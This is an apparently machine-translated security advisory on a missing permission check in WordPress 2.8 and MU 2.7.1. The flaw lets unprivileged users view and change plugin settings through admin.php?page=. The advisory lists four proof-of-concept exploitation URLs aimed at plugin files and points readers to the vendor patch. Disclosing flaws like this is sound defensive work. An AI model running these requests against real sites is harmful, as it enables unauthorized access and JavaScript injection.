Affected Versions:
WordPress 2.8/WordPress MU 2.7.1
Program introduction:
WordPress is a free forum Blog system.
Vulnerability Analysis:
WordPress lacks permission check for the PHP module configured with the page parameter plug-in. If the non-privileged user uses admin in the request. php replaces options-general.php or plugins. php, you can view the content on the plug-in configuration page without authorization, or modify some plug-in options and inject JavaScript code.
Vulnerability Exploitation:
Http://www.example.com/wp-admin/admin.php? Page =/collapsing-archives/options.txt
Http://www.example.com/wp-admin/admin.php? Page = akismet/readme.txt
Http://www.example.com/wp-admin/admin.php? Page = related-ways-to-take-action/options. php
Http://www.example.com/wp-admin/admin.php? Page = wp-security-scan/securityscan. php
Solution:
Vendor patch:
WordPress
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://wordpress.org/
Information Source:
<* Source: Fernando Arnaboldi
Link: http://marc.info /? L = bugtraq & m = 124709299823452 & w = 2
*>